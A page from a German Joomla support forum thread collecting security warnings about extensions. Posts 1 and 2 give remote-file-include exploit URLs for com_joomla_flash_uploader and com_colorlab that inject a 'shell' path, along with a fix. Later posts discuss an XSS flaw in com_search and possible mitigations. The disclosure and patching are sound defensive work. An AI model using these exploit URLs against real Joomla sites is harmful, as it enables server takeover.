+ Antworten
Seite 1 von 4 1 2 3 4 LetzteLetzte
Ergebnis 1 bis 10 von 35

Thema: Exploits: Sicherheitswarnungen über Erweiterungen

  1. #1
    Verbringt hier viel Zeit
    Registriert seit
    08.03.2007
    Beiträge
    734
    Bedankte sich
    10
    Erhielt 190 Danksagungen
    in 168 Beiträgen

    Standard Exploits: Sicherheitswarnungen über Erweiterungen

    Joomla Flash Uploader

    Joomla com_joomla_flash_uploader Remote File Include 2.5.1,2.5.2

    = http://download.joomlaportal.ch/content/view/1060/
    =
    ============================================
    =
    = Exploit:
    = administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolu te_path=shell?
    = administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_abso lute_path=shell?
    Hilfe gibt es unter Angabe von: Hoster, Joomla Version, Installierte Komponenten, PHPInfo, Problembeschreibung
    Joomla 1.5 Anleitung - CHMOD Verzeichnisse 755 | Dateien 644 | 777 du wirst gehackt!
    Info: Privat Support nur gegen Vorkasse

  2. #2
    Verbringt hier viel Zeit
    Registriert seit
    08.03.2007
    Beiträge
    734
    Bedankte sich
    10
    Erhielt 190 Danksagungen
    in 168 Beiträgen

    Standard Exploit: Sicherheitswarnung - com_colorlab

    Download:
    http://download.joomlaportal.ch/content/view/474/
    --------------------
    Wrong Code:
    include( "$mosConfig_live_site/components/com_color/about.html" );
    --------------------
    Exploit:
    /components/com_colorlab/admin.color.php?mosConfig_live_site=shell?
    --------------------
    Behebung des Problems:

    1-öffne admin.colo.php
    2-folgende Zeile einfügen

    defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );


    How to Fix:
    1-open admin.colo.php
    2-write this codes before wrong codes

    defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

    3-save and exit
    Hilfe gibt es unter Angabe von: Hoster, Joomla Version, Installierte Komponenten, PHPInfo, Problembeschreibung
    Joomla 1.5 Anleitung - CHMOD Verzeichnisse 755 | Dateien 644 | 777 du wirst gehackt!
    Info: Privat Support nur gegen Vorkasse

  3. #3
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.188
    Bedankte sich
    63
    Erhielt 1.224 Danksagungen
    in 1.071 Beiträgen

    Standard

    Zitat Zitat von rickkp Beitrag anzeigen
    Behebung des Problems:
    Nee, Behebung des Problems: Den Schrott löschen!

    Wenn schon solche elementaren Fehler drin sind, die seit Urzeiten bekannt und sind und kommuniziert werden (wie unsicher wird dann der Rest sein?), kann man den Autor bei gehackten Seiten ohne Gewissensbisse auf Schadensersatz verklagen.

  4. #4
    Verbringt hier viel Zeit
    Registriert seit
    08.03.2007
    Beiträge
    734
    Bedankte sich
    10
    Erhielt 190 Danksagungen
    in 168 Beiträgen

    Standard Exploit: Sicherheitswarnung - com_search - J! 1.0.13

    Joomla 1.0.13 Komponente com_search verwundbar gegen Cross-Site Scripting

    Das Problem ist bekannt und es wird daran gearbeitet.

    Ob Versionen vor 1.0.13 betroffen sind, ist nicht bekannt.

    www.joomla.org

    www.securityfocus.com
    Hilfe gibt es unter Angabe von: Hoster, Joomla Version, Installierte Komponenten, PHPInfo, Problembeschreibung
    Joomla 1.5 Anleitung - CHMOD Verzeichnisse 755 | Dateien 644 | 777 du wirst gehackt!
    Info: Privat Support nur gegen Vorkasse

  5. #5
    Hat hier eine Zweitwohnung Avatar von pctech
    Registriert seit
    02.12.2006
    Ort
    Gibswil ZH CH
    Beiträge
    1.415
    Bedankte sich
    153
    Erhielt 260 Danksagungen
    in 245 Beiträgen

    Standard

    Holla, das isch schlecht. :( :(
    Sofort abschalten? Nur noch für registrierte machen ojojoje

    Nun ja alle suchfunktionen nur noch für angemeldete Benutzer gemacht bei allen Such Mambots und menülink zur kommponente erstellt und auch nur für angemeldete. Villeicht hilfts.
    Was denkt Ihr, eine denny from all htaccess anlegen in com_search?

    TagClouds arbeitet mit der Suchfunktion zusammen, hoffentlich kommt bald ein patch raus.... Ich kucke aber mal selber.....

    serarch.php zeigt doch da was htmlspecialchars. Giebst da ned noch was besseres.....

    Code:
        $searchword_clean = htmlspecialchars( $searchword );
    
            search_html::searchintro( $searchword_clean, $params );
    Ausserdem was mich ein wenig verwirrt:
    Code:
    } else if ( in_array( $searchword, $search_ignore ) ) {
            // html output
            search_html::message( _IGNOREKEYWORD, $params );
        } else {
            // html output
    Wo kann man den die Stopwörter festlegen, ich wüsste ned wo.
    Geändert von cybergurk (14.10.2007 um 14:59 Uhr) Grund: editierenfunktion nutzen bitte, danke
    Vielen Dank für Eure Zeit und Grüsschen aus der Schweiz. pcte.ch Webservices
    Man kann einen Menschen nichts lehren, man kann ihm nur helfen, es in sich selbst zu entdecken.. (Galileo Galilei)
    Joomla Grundlagen schon gelesen?

  6. #6
    Verbringt hier viel Zeit
    Registriert seit
    08.03.2007
    Beiträge
    734
    Bedankte sich
    10
    Erhielt 190 Danksagungen
    in 168 Beiträgen

    Standard

    Es gibt einen Eintrag im Tracker

    http://joomlacode.org/gf/project/joo...r_item_id=7608

    In der SVN ist noch nichts aktuelles.
    Hilfe gibt es unter Angabe von: Hoster, Joomla Version, Installierte Komponenten, PHPInfo, Problembeschreibung
    Joomla 1.5 Anleitung - CHMOD Verzeichnisse 755 | Dateien 644 | 777 du wirst gehackt!
    Info: Privat Support nur gegen Vorkasse

  7. #7
    Hat hier eine Zweitwohnung Avatar von pctech
    Registriert seit
    02.12.2006
    Ort
    Gibswil ZH CH
    Beiträge
    1.415
    Bedankte sich
    153
    Erhielt 260 Danksagungen
    in 245 Beiträgen

    Standard

    @rickkp
    Ok filter /includes/phpInputFilter/class.inputfilter.php
    Zeile 365.
    Code:
    if ((!eregi("^[a-z]*$", $attrSubSet[0])) || (($this->xssAuto)
    && ((in_array(strtolower($attrSubSet[0]), $this->attrBlacklist)) ||
    (substr(strtolower($attrSubSet[0]), 0, 2) == 'on'))))

    meinst Du das ist es nu?
    Vielen Dank für Eure Zeit und Grüsschen aus der Schweiz. pcte.ch Webservices
    Man kann einen Menschen nichts lehren, man kann ihm nur helfen, es in sich selbst zu entdecken.. (Galileo Galilei)
    Joomla Grundlagen schon gelesen?

  8. #8
    Gehört zum Inventar
    Registriert seit
    18.02.2005
    Beiträge
    8.841
    Bedankte sich
    85
    Erhielt 2.267 Danksagungen
    in 1.935 Beiträgen

    Standard

    Wenn dort htmlspecialchars() drüberläuft verstehe ich dir Problematik nicht.
    Spätestens mit strip_tags() und htmlspecialchars() ist doch Ende mit XSS.

    Wo kann man den die Stopwörter festlegen, ich wüsste ned wo.
    Wird das nicht als Sprachdatei in laguages/german.ignore.php angelegt?
    Eine Black-List ist allerdings kein wirksames bzw. sinnvolles Mittel gegen XSS.

    Grüße
    ec

  9. #9
    Verbringt hier viel Zeit
    Registriert seit
    08.03.2007
    Beiträge
    734
    Bedankte sich
    10
    Erhielt 190 Danksagungen
    in 168 Beiträgen

    Standard

    Keine Ahnung - der Beitrag im Tracker ist nicht confirmed!

    Rob von joomla.org hat mir noch nicht geantwortet - wird noch in der Falle liegen, ist ja erst 8 Uhr in USA
    Hilfe gibt es unter Angabe von: Hoster, Joomla Version, Installierte Komponenten, PHPInfo, Problembeschreibung
    Joomla 1.5 Anleitung - CHMOD Verzeichnisse 755 | Dateien 644 | 777 du wirst gehackt!
    Info: Privat Support nur gegen Vorkasse

  10. #10
    Hat hier eine Zweitwohnung Avatar von pctech
    Registriert seit
    02.12.2006
    Ort
    Gibswil ZH CH
    Beiträge
    1.415
    Bedankte sich
    153
    Erhielt 260 Danksagungen
    in 245 Beiträgen

    Standard

    Ja klar, mache ich..
    Sorry für die Umstände
    hehehe na is ja auch sonntag

    Hey, danke stimmt, im ignore liegts
    ja klar, aber vielleicht kann mans ein bischen begrenzen damit,
    Was meinst Du über die htacess zu regeln?
    Geändert von pctech (14.10.2007 um 15:37 Uhr) Grund: editierenfunktion nutzen bitte, danke
    Vielen Dank für Eure Zeit und Grüsschen aus der Schweiz. pcte.ch Webservices
    Man kann einen Menschen nichts lehren, man kann ihm nur helfen, es in sich selbst zu entdecken.. (Galileo Galilei)
    Joomla Grundlagen schon gelesen?

+ Antworten
Seite 1 von 4 1 2 3 4 LetzteLetzte

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein